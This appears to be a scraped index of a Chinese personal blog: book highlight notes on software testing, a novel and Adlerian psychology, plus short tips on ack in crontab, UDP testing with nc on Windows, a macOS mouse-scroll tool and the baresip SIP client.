\u0026gt; 位置 1906我们需要在正确的时间,投入正确数量的 TE,并带来足够的价值。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1908当前软件的薄弱点在哪里?标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1909有没有安全、隐私、性能、可靠性、可用性、标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1910主要用户场景是否功能正常?标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1911当发生问题的时候,是否容易诊断问题所在?标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1914TE的根本使命是保护用户和业务的利益,使之不受到糟糕的设计、令人困惑的用户体验、标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1921TE擅长发现需求中的模糊之处,标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1924TE通常是团队里最出名的人,因为他们需要与各种角色标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1938下面是我们关于 TE职责的一般性描述。测试计划和风险分析。评审需求、设计、代码和测试。探索式测试。用户场景。编写测试用例。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1949如果软件深受人们喜爱,大家就会认为测试所作所为是理所应当的;如果软件很糟糕,人们可能就会质疑测试工作。笔记 - 3.2.1 测试计划 \u0026gt; 位置 1950测试背锅标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1990读者可以用“ Google Test Analytics”关键词搜索到这个工具。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1991避免散漫的文字,推荐使用简明的列表。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1993不必推销。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1995简洁。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1996不要把不重要的、无法执行的东西放进测试标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1998渐进式的描述( Make it flow)。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2001最终结果应该是测试用例。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 20091. A代表特质( Attribute)标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2010在开始测试计划或做 ACC分析的时候,必须先确定该产品对用户、对业务的意义。我们为什么要开发这个东西呢?它能带来什么核心价值?它又靠什么来吸引用户?记住,标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 20462. C代表组件( component)组件是系统的名词,在特质被识别之后确定。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2049组件是构成待建系统的模块,标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 20633. 
C代表能力( capability)能力是系统的动词,代表着系统在用户指令之下完成的动作。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2095能力最重要的一个特点是它的可测试性。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2098能力最重要的一个特点是它的可测试性。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2100一个能力可以描述任意数量的用例。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2130用一系列能力来描述用户故事,标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2142确定 Google +的特质、组件和能力。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2193风险无处不在——标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2202确定风险的过程称为风险分析。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 22021.风险分析标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2204这些事件发生的可能性有多大?一旦发生,对公司产生多大影响?一旦发生,对客户产生多大影响?产品具备什么缓解措施?标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2206这些缓解措施有多大可能会失败?处理这些失败的成本有哪些?恢复过程有多困难?事件是一次性问题,还是会再次发生?影响标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2209在 Google,我们确定了两个要素:失败频率( frequency of failure)和影响( impact)。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2214风险发生频率有 4个预定义值。罕见(标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2217少见( seldom):标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2221偶尔( occasionally):标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2225常见( often):标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2229测试人员确定每个能力的故障发生频率。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2230估计风险影响的方法大致相同,也是从几种偶数取值中选标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2231最小( minimal):用户甚至不会注意到的问题。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2234一些( some):可能会打扰到用户的问题。一旦发生,重试或恢复标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2237较大( considerable):故障导致标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2240最大( maximal):发生的故障会永久性的损害产品的声誉,并导致用户不再使用它。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2267风险不大可能彻底消除。驾驶有风险,但我们仍然会开车出行;旅游有风险,但我们并没有停止旅游。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2285在软件开发中,任何一种可以在 10分钟之内完成的事情都是微不足道的,或是本来就不值得做的。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2323风险分析是一个独立的领域,在许多其他行业里被严肃地对待。我们现在采用的是一个轻量级的版本,标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2325风险管理方法),这可以作为进一步学习这一重要课题的起点。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2328TE有责任理解所有的风险点,并使用他或她可以利用的任何手段予以缓解。标注(黄色) - 3.2.5 TE的招聘 \u0026gt; 位置 2668他们只是在试图破坏软件,还是同时在验证它能正常工作?标注(黄色) - 3.2.5 TE的招聘 \u0026gt; 位置 2717我们需要的是愿意持续学习和成长的人。我们也需要那些带来新鲜思想和经验的人,标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 
3301对于一个新项目,我首先要站在用户的角度了解这个产品。有可能的话,我会作为一个用户,以自己的账户和个人数据去使用产品。我努力使自己经历完整的用户体验。一旦有自己的真实数据在里面,你对一个产品的期待会彻底改变。在具备了用户心态之后,我会做下面的一些事情。标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3362遗漏到客户的 bug是一项重要指标,我希望这个数字接近 0。标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3377或者用户场景无需编写、自动到位。 CRUD操作(译注: create、 read、 update、 delete)标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3385团队在推出一个产品或新功能时难免感到提心吊胆,而我能带给他们镇定和信心,这使我感到自己是一种正面、有益的力量。标注(黄色) - 3.4 与YouTube测试工程师安普·周(Apple Chow)的访谈 \u0026gt; 位置 3416而 Google的 SET必须写代码,这是他们的工作。这里也很难找到不会写代码的 TE。标注(黄色) - 3.4 与YouTube测试工程师安普·周(Apple Chow)的访谈 \u0026gt; 位置 3426Google的测试与其他公司的相同之处呢? Apple:在测试上难以自动化的软件,很难成为好的软件。标注(黄色) - 3.4 与YouTube测试工程师安普·周(Apple Chow)的访谈 \u0026gt; 位置 3493不管是测试框架还是测试用例都以简单为要,随着项目的开展再迭代的设计。不要试图事先解决所有问题。要敢于扔掉过时的东西。第4章 测试工程经理标注(黄色) - 4.8 搜索和地理信息测试总监Shelton Mar的访谈 \u0026gt; 位置 3989把测试推向上游,让整个团队(开发 +测试)为交付的质量负责。标注(黄色) - 4.8 搜索和地理信息测试总监Shelton Mar的访谈 \u0026gt; 位置 4025从那以后,我们把配置变更也纳入质量流程中,我们开发了一套自动化测试,每次数据和配置变更时都要执行。标注(黄色) - 4.11 工程经理Brad Green访谈 \u0026gt; 位置 4219Google聘用的都是有极端自我驱动力的家伙。“标注(黄色) - 4.12 James Whittaker访谈 \u0026gt; 位置 4339先虚心学习,再在一线作出成绩,然后开始寻求创新的方法。第5章 Google软件测试改进标注(黄色) - 位置 4398Google的测试流程可以非常简练地概括为:标注(黄色) - 位置 4398让每个工程师都注重质量。标注(黄色) - 位置 4398只要大家诚实认真地这么做,质量就会提高。代码质量从一开始就能更好,标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4408可是测试并不能保证质量。质量是内建的,而不是外加的。因此,保证质量是开发者的任务,标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4409测试成了开发的拐杖。我们越不让开发考虑测试的问题,把测试变得越简单,开发就越来越不会去做测试。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4415保证质量不但是别人的问题,它甚至还属于另一个部门。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4416出问题的时候也很容易就把责任推卸给修前草坪的外包公司。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4426第三个致命的缺陷,是测试人员往往崇拜测试产物( test artifact)胜过软件本身。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4430所有测试产物的价值,在于它们对代码的影响,进而通过产品来体现。标注(黄色) - 5.2 SET的未来 \u0026gt; 位置 4447简单来说,我们认为 SET没有未来。 SET就是开发。就这么简单。标注(黄色) - 5.2 SET的未来 \u0026gt; 位置 
4450SET直接负责很多功能特性,如可测试性、可靠性、可调试性,\n","permalink":"https://wdd.js.org/posts/2021/07/yh8ulq/","summary":"Google软件测试之道(异步图书)James Whittaker; Jason Arbon; Jeff Carollo\n序标注(黄色) - 位置 361从根本上说,如果测试人员想加入这个俱乐部,就必须具备良好的计算机科学基础和编程能力。变革标注(黄色) - 位置 367招聘具备开发能力的测试人员很难,找到懂测试的开发人员就更难,标注(黄色) - 位置 368但是维持现状更要命,我只能往前走。标注(黄色) - 位置 388我们寻找的人要兼具开发人员的技能和测试人员的思维,他们必须会编程,能实现工具、平台和测试自动化。第1章 Google软件测试介绍标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 573Google能用如此少的专职测试人员的原因,就是开发对质量的负责。标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 574如果某个产品出了问题,第一个跳出来的肯定是导致这个问题发生的开发人员,而不是遗漏这个 bug的测试人员。标注(黄色) - 1.2.1 软件开发工程师(SWE) \u0026gt; 位置 593软件开发工程师(标注(黄色) - 1.2.2 软件测试开发工程师(SET) \u0026gt; 位置 600软件测试开发工程师(标注(黄色) - 1.2.3 测试工程师(TE) \u0026gt; 位置 612TE把用户放在第一位来思考。 TE组织整体质量实践,分析解释测试运行结果,第2章 软件测试开发工程师书签 - 位置 784标注(黄色) - 位置 787Google的 SWE是功能开发人员; Google的 SET是测试开发人员; Google的 TE是用户开发人员。标注(黄色) - 2.1.1 开发和测试流程 \u0026gt; 位置 864测试驱动开发”标注(黄色) - 2.","title":"Google软件测试之道(异步图书) James Whittaker; Jason Arbon; Jeff Carollo"},{"content":"沉默的病人(世界狂销300万册的烧脑神作!多少看似完美的夫妻,都在等待杀死对方的契机)亚历克斯·麦克利兹\n第二部分 PAPT TWO标注(黄色) - 9 \u0026gt; 位置 1294选择自己所爱的人就像选择心理治疗师,”鲁思说,“我们有必要问自己,这个人会不会对我忠诚,能不能听得进批评,标注(黄色) - 9 \u0026gt; 位置 1295承认所犯的错误,而且做不到的事情决不承诺?”第三部分 PAPT THREE标注(黄色) - 位置 2577虽然我生来不是个好人,有时我却偶然要做个好人。——威廉·莎士比亚《冬天的故事》[\n","permalink":"https://wdd.js.org/posts/2021/07/rgx3g5/","summary":"沉默的病人(世界狂销300万册的烧脑神作!多少看似完美的夫妻,都在等待杀死对方的契机)亚历克斯·麦克利兹\n第二部分 PAPT TWO标注(黄色) - 9 \u0026gt; 位置 1294选择自己所爱的人就像选择心理治疗师,”鲁思说,“我们有必要问自己,这个人会不会对我忠诚,能不能听得进批评,标注(黄色) - 9 \u0026gt; 位置 1295承认所犯的错误,而且做不到的事情决不承诺?”第三部分 PAPT THREE标注(黄色) - 位置 2577虽然我生来不是个好人,有时我却偶然要做个好人。——威廉·莎士比亚《冬天的故事》[","title":"沉默的病人(世界狂销300万册的烧脑神作!多少看似完美的夫妻,都在等待杀死对方的契机)"},{"content":"手工执行,可以获得预期结果,但是在crontab中,却查不到结果。\nstage_count=$(ack -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 最终使用--nofilter参数,解决了问题。\nstage_count=$(ack --nofilter -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 参考\nhttps://stackoverflow.com/questions/55777520/ack-fails-in-cronjob-but-runs-fine-from-commandline 
","permalink":"https://wdd.js.org/shell/contab-ack/","summary":"手工执行,可以获得预期结果,但是在crontab中,却查不到结果。\nstage_count=$(ack -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 最终使用--nofilter参数,解决了问题。\nstage_count=$(ack --nofilter -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 参考\nhttps://stackoverflow.com/questions/55777520/ack-fails-in-cronjob-but-runs-fine-from-commandline ","title":"Ack 在contab中无法查到关键词"},{"content":"引言标注(黄色) - 位置 225人并不是住在客观的世界,而是住在自己营造的主观世界里。第一夜 我们的不幸是谁的错?标注(黄色) - 不为人知的心理学“第三巨头” \u0026gt; 位置 335但在世界上,阿德勒是与弗洛伊德、荣格并列的三大巨头之一。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 377如果所有人的“现在”都由“过去”所决定,那岂不是很奇怪吗?标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 384您是说与过去没有关系?哲人:是的,这就是阿德勒心理学的立场。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 389阿德勒心理学考虑的不是过去的“原因”,而是现在的“目的”。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 417任何经历本身并不是成功或者失败的原因。我们并非因为自身经历中的刺激——所谓的心理创伤——而痛苦,事实上我们会从经历中发现符合自己目的的因素。决定我们自身的不是过去的经历,而是我们自己赋予经历的意义。”标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 423人生不是由别人赋予的,而是由自己选择的,是自己选择自己如何生活。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 443我们大家都是在为了某种“目的”而活着。这就是目的论。标注(黄色) - 你的不幸,皆是自己“选择”的 \u0026gt; 位置 599而是因为你认为“不幸”对你自身而言是一种“善”。标注(黄色) - 人们常常下定决心“不改变” \u0026gt; 位置 614某人如何看“世界”,又如何看“自己”,把这些“赋予意义的方式”汇集起来的概念就可以理解为生活方式。标注(黄色) - 你的人生取决于“当下” \u0026gt; 位置 706无论之前的人生发生过什么,都对今后的人生如何度过没有影响。”决定自己人生的是活在“此时此刻”的你自己。第二夜 一切烦恼都来自人际关系标注(黄色) - 为什么讨厌自己? 
\u0026gt; 位置 780阿德勒心理学把这叫作“鼓励”。青年:鼓励?书签 - 一切烦恼都是人际关系的烦恼 \u0026gt; 位置 834标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 936自卑情结是指把自己的自卑感当作某种借口使用的状态。标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 943外部因果律”一词来进行说明。意思就是:将原本没有任何因果关系的事情解释成似乎有重大因果关系一样。标注(黄色) - 人生不是与他人的比赛 \u0026gt; 位置 1044健全的自卑感不是来自与别人的比较,而是来自与“理想的自己”的比较。标注(黄色) - 在意你长相的,只有你自己 \u0026gt; 位置 1071在意你长相的,只有你自己标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1223交友课题、工作课题以及爱的课题标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1224一切烦恼皆源于人际关系”标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1313当人能够感觉到“与这个人在一起可以无拘无束”的时候,才能够体会到爱。既没有自卑感也不必炫耀优越性,能够保持一种平静而自然的状态。真正的爱应该是这样的。标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1315束缚是想要支配对方的表现,也是一种基于不信任感的想法。与一个不信任自己的人处在同一个空间里,那就根本不可能保持一种自然状态。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1333那并不是因为无法容忍 A的缺点才讨厌他,而是你先有“要讨厌 A”这个目的,之后才找出了符合这个目的的缺点。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1345人就是这么任性而自私的生物,一旦产生这种想法,无论怎样都能发现对方的缺点。标注(黄色) - 阿德勒心理学是“勇气的心理学” \u0026gt; 位置 1373青年:也就是“不在于被给予了什么,而在于如何去使用被给予的东西”那句话吗?第三夜 让干涉你生活的人见鬼去标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1405就是:“货币是被铸造的自由。”它是陀思妥耶夫斯基的小说中出现的一句话。“被铸造的自由”这种说法是何等的痛快啊!我认为这是一句非常精辟的话,它一语道破了货币的标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1449阿德勒心理学否定寻求他人的认可。标注(黄色) - 要不要活在别人的期待中? \u0026gt; 位置 1479在犹太教教义中有这么一句话:“倘若自己都不为自己活出自己的人生,那还有谁会为自己而活呢?”你就活在自己的人生中。书签 - 要不要活在别人的期待中? 
\u0026gt; 位置 1498标注(黄色) - 砍断“格尔迪奥斯绳结” \u0026gt; 位置 1689否定原因论、否定精神创伤、采取目的论;认为人的烦恼全都是关于人际关系的烦恼;此外,不寻求认可或者课题分离也全都是反常识的理论。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1764自由就是被别人讨厌”。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1785不畏惧被人讨厌而是勇往直前,不随波逐流而是激流勇进,这才是对人而言的自由。第五夜 认真的人生“活在当下”标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2910人生中最大的谎言就是不活在“此时此刻”。纠结过去、关注未来,把微弱而模糊的光打向人生整体,自认为看到了些什么。标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2916因为过去和未来根本不存在,所以才要谈现在。起决定作用的既不是昨天也不是明天,而是“此时此刻”。标注(黄色) - 人生的意义,由你自己决定 \u0026gt; 位置 2982必须有人开始。即使别人不合作,那也与你无关。我的意见就是这样。应该由你开始,不用去考虑别人是否合作。”后记标注(黄色) - 位置 3011一切烦恼皆源于人际关系”“人可以随时改变并能够获得幸福”“问题不在于能力而在于勇气\n","permalink":"https://wdd.js.org/posts/2021/06/ineayu/","summary":"引言标注(黄色) - 位置 225人并不是住在客观的世界,而是住在自己营造的主观世界里。第一夜 我们的不幸是谁的错?标注(黄色) - 不为人知的心理学“第三巨头” \u0026gt; 位置 335但在世界上,阿德勒是与弗洛伊德、荣格并列的三大巨头之一。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 377如果所有人的“现在”都由“过去”所决定,那岂不是很奇怪吗?标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 384您是说与过去没有关系?哲人:是的,这就是阿德勒心理学的立场。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 389阿德勒心理学考虑的不是过去的“原因”,而是现在的“目的”。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 417任何经历本身并不是成功或者失败的原因。我们并非因为自身经历中的刺激——所谓的心理创伤——而痛苦,事实上我们会从经历中发现符合自己目的的因素。决定我们自身的不是过去的经历,而是我们自己赋予经历的意义。”标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 423人生不是由别人赋予的,而是由自己选择的,是自己选择自己如何生活。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 443我们大家都是在为了某种“目的”而活着。这就是目的论。标注(黄色) - 你的不幸,皆是自己“选择”的 \u0026gt; 位置 599而是因为你认为“不幸”对你自身而言是一种“善”。标注(黄色) - 人们常常下定决心“不改变” \u0026gt; 位置 614某人如何看“世界”,又如何看“自己”,把这些“赋予意义的方式”汇集起来的概念就可以理解为生活方式。标注(黄色) - 你的人生取决于“当下” \u0026gt; 位置 706无论之前的人生发生过什么,都对今后的人生如何度过没有影响。”决定自己人生的是活在“此时此刻”的你自己。第二夜 一切烦恼都来自人际关系标注(黄色) - 为什么讨厌自己? 
\u0026gt; 位置 780阿德勒心理学把这叫作“鼓励”。青年:鼓励?书签 - 一切烦恼都是人际关系的烦恼 \u0026gt; 位置 834标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 936自卑情结是指把自己的自卑感当作某种借口使用的状态。标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 943外部因果律”一词来进行说明。意思就是:将原本没有任何因果关系的事情解释成似乎有重大因果关系一样。标注(黄色) - 人生不是与他人的比赛 \u0026gt; 位置 1044健全的自卑感不是来自与别人的比较,而是来自与“理想的自己”的比较。标注(黄色) - 在意你长相的,只有你自己 \u0026gt; 位置 1071在意你长相的,只有你自己标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1223交友课题、工作课题以及爱的课题标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1224一切烦恼皆源于人际关系”标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1313当人能够感觉到“与这个人在一起可以无拘无束”的时候,才能够体会到爱。既没有自卑感也不必炫耀优越性,能够保持一种平静而自然的状态。真正的爱应该是这样的。标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1315束缚是想要支配对方的表现,也是一种基于不信任感的想法。与一个不信任自己的人处在同一个空间里,那就根本不可能保持一种自然状态。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1333那并不是因为无法容忍 A的缺点才讨厌他,而是你先有“要讨厌 A”这个目的,之后才找出了符合这个目的的缺点。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1345人就是这么任性而自私的生物,一旦产生这种想法,无论怎样都能发现对方的缺点。标注(黄色) - 阿德勒心理学是“勇气的心理学” \u0026gt; 位置 1373青年:也就是“不在于被给予了什么,而在于如何去使用被给予的东西”那句话吗?第三夜 让干涉你生活的人见鬼去标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1405就是:“货币是被铸造的自由。”它是陀思妥耶夫斯基的小说中出现的一句话。“被铸造的自由”这种说法是何等的痛快啊!我认为这是一句非常精辟的话,它一语道破了货币的标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1449阿德勒心理学否定寻求他人的认可。标注(黄色) - 要不要活在别人的期待中? \u0026gt; 位置 1479在犹太教教义中有这么一句话:“倘若自己都不为自己活出自己的人生,那还有谁会为自己而活呢?”你就活在自己的人生中。书签 - 要不要活在别人的期待中? 
\u0026gt; 位置 1498标注(黄色) - 砍断“格尔迪奥斯绳结” \u0026gt; 位置 1689否定原因论、否定精神创伤、采取目的论;认为人的烦恼全都是关于人际关系的烦恼;此外,不寻求认可或者课题分离也全都是反常识的理论。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1764自由就是被别人讨厌”。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1785不畏惧被人讨厌而是勇往直前,不随波逐流而是激流勇进,这才是对人而言的自由。第五夜 认真的人生“活在当下”标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2910人生中最大的谎言就是不活在“此时此刻”。纠结过去、关注未来,把微弱而模糊的光打向人生整体,自认为看到了些什么。标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2916因为过去和未来根本不存在,所以才要谈现在。起决定作用的既不是昨天也不是明天,而是“此时此刻”。标注(黄色) - 人生的意义,由你自己决定 \u0026gt; 位置 2982必须有人开始。即使别人不合作,那也与你无关。我的意见就是这样。应该由你开始,不用去考虑别人是否合作。”后记标注(黄色) - 位置 3011一切烦恼皆源于人际关系”“人可以随时改变并能够获得幸福”“问题不在于能力而在于勇气","title":"被讨厌的勇气:“自我启发之父”阿德勒的哲学课"},{"content":"有时候,客户端的udp包被中间的防火墙拦截了,在linux上可以很简单的用nc启动一个udp server\n# 启动udp server 监听8888端口 nc -ulp 20000 # 启动udp client nc -u 127.0.0.1 20000 在linux上启动nc udp server很简单,但是在windows上,没办法安装nc啊?😭\n峰回路转 https://nmap.org/download.html 在查看了nc的官网之后,发现nc实际上也提供了windows的程序,有两种版本。\n有GUI界面的,使用友好,安装包比较大 https://nmap.org/dist/nmap-7.91-setup.exe 仅仅在命令行下执行,刚好满足需求 https://nmap.org/dist/nmap-7.91-win32.zip 看看带GUI界面的\n附件 nmap-7.91-win32.zip ","permalink":"https://wdd.js.org/posts/2021/06/ex5n9h/","summary":"有时候,客户端的udp包被中间的防火墙拦截了,在linux上可以很简单的用nc启动一个udp server\n# 启动udp server 监听8888端口 nc -ulp 20000 # 启动udp client nc -u 127.0.0.1 20000 在linux上启动nc udp server很简单,但是在windows上,没办法安装nc啊?😭\n峰回路转 https://nmap.org/download.html 在查看了nc的官网之后,发现nc实际上也提供了windows的程序,有两种版本。\n有GUI界面的,使用友好,安装包比较大 https://nmap.org/dist/nmap-7.91-setup.exe 仅仅在命令行下执行,刚好满足需求 https://nmap.org/dist/nmap-7.91-win32.zip 看看带GUI界面的\n附件 nmap-7.91-win32.zip ","title":"windows版本nc教程:在windows上做udp测试"},{"content":"现象 有时候轻微滚动滚轮,页面不滚动,然后突然又发生了滚动 解决方案 Mos https://github.com/Caldis/Mos 一个用于在MacOS上平滑你的鼠标滚动效果的小工具, 让你的滚轮爽如触控板。 特性 疯狂平滑你的鼠标滚动效果 支持分离触控板/鼠标事件, 单独翻转鼠标滚动方向。 滚动曲线的自定义调整。 支持区分应用处理, 黑/白名单系统。 用于监控滚动事件的图形化呈现窗口。 基于 Swift4 构建 免费 附件 Mos.Versions.3.3.2.dmg ","permalink":"https://wdd.js.org/posts/2021/06/ismran/","summary":"现象 有时候轻微滚动滚轮,页面不滚动,然后突然又发生了滚动 解决方案 Mos https://github.com/Caldis/Mos 一个用于在MacOS上平滑你的鼠标滚动效果的小工具, 让你的滚轮爽如触控板。 特性 
疯狂平滑你的鼠标滚动效果 支持分离触控板/鼠标事件, 单独翻转鼠标滚动方向。 滚动曲线的自定义调整。 支持区分应用处理, 黑/白名单系统。 用于监控滚动事件的图形化呈现窗口。 基于 Swift4 构建 免费 附件 Mos.Versions.3.3.2.dmg ","title":"macos 鼠标滚轮不灵敏"},{"content":"安装 安装前要先安装依赖\nhttps://github.com/baresip/re https://github.com/baresip/rem openssl git clone https://github.com/baresip/baresip cd baresip make sudo make install 指令 /about About box/accept Accept incoming call/answermode Set answer mode/apistate User Agent state/auloop Start audio-loop /auloop_stop Stop audio-loop/auplay Switch audio player/ausrc Switch audio source/callstat Call status/conf_reload Reload config file/config Print configuration/contact_next Set next contact/contact_prev Set previous contact/contacts List contacts/dial .. Dial/dialcontact Dial current contact/hangup Hangup call/help Help menu/insmod Load module/listcalls List active calls/loglevel Log level toggle/main Main loop debug/memstat Memory status/message Message current contact/modules Module debug/netstat Network debug/options Options/play Play audio file/quit Quit/reginfo Registration info/rmmod Unload module/sipstat SIP debug/sysinfo System info/timers Timer debug/uadel Delete User-Agent/uafind Find User-Agent /uanew Create User-Agent/uanext Toggle UAs/uastat UA debug/uuid Print UUID/vidloop Start video-loop /vidloop stop Stop video-loop/vidsrc Switch video source\n模块 aac Advanced Audio Coding (AAC) audio codecaccount Account loaderalsa ALSA audio driveramr Adaptive Multi-Rate (AMR) audio codecaptx Audio Processing Technology codec (aptX)aubridge Audio bridge moduleaudiounit AudioUnit audio driver for MacOSX/iOSaufile Audio module for using a WAV-file as audio inputauloop Audio-loop test moduleausine Audio sine wave input moduleav1 AV1 video codecavcapture Video source using iOS AVFoundation video captureavcodec Video codec using FFmpeg/libav libavcodecavformat Video source using FFmpeg/libav libavformatb2bua Back-to-Back User-Agent (B2BUA) modulecodec2 Codec2 low bit rate speech codeccons UDP/TCP console UI drivercontact 
Contacts modulecoreaudio Apple macOS Coreaudio driverctrl_tcp TCP control interface using JSON payloaddebug_cmd Debug commandsdirectfb DirectFB video display moduledshow Windows DirectShow video sourcedtls_srtp DTLS-SRTP end-to-end encryptionebuacip EBU ACIP (Audio Contribution over IP) Profileecho Echo server moduleevdev Linux input driverfakevideo Fake video input/output driverg711 G.711 audio codecg722 G.722 audio codecg7221 G.722.1 audio codecg726 G.726 audio codecgsm GSM audio codecgst Gstreamer audio sourcegst_video Gstreamer video codecgtk GTK+ 2.0 UIgzrtp ZRTP module using GNU ZRTP C++ libraryhttpd HTTP webserver UI-modulei2s I2S (Inter-IC Sound) audio driverice ICE protocol for NAT Traversaljack JACK Audio Connection Kit audio-driverl16 L16 audio codecmenu Interactive menumpa MPA Speech and Audio Codecmulticast Multicast RTP send and receivemqtt MQTT (Message Queue Telemetry Transport) modulemwi Message Waiting Indicationnatpmp NAT Port Mapping Protocol (NAT-PMP) moduleomx OpenMAX IL video display moduleopensles OpenSLES audio driveropus OPUS Interactive audio codecpcp Port Control Protocol (PCP) moduleplc Packet Loss Concealment (PLC) using spandspportaudio Portaudio driverpulse Pulseaudio driverpresence Presence modulertcpsummary RTCP summary modulerst Radio streamer using mpg123sdl Simple DirectMedia Layer 2.0 (SDL) video output driverselfview Video selfview modulesnapshot Save video-stream as PNG imagessndfile Audio dumper using libsndfilesndio Audio driver for OpenBSDspeex_pp Audio pre-processor using libspeexdspsrtp Secure RTP encryption (SDES) using libre SRTP-stackstdio Standard input/output UI driverstun Session Traversal Utilities for NAT (STUN) moduleswscale Video scaling using libswscalesyslog Syslog moduleturn Obtaining Relay Addresses from STUN (TURN) moduleuuid UUID generator and loaderv4l2 Video4Linux2 video 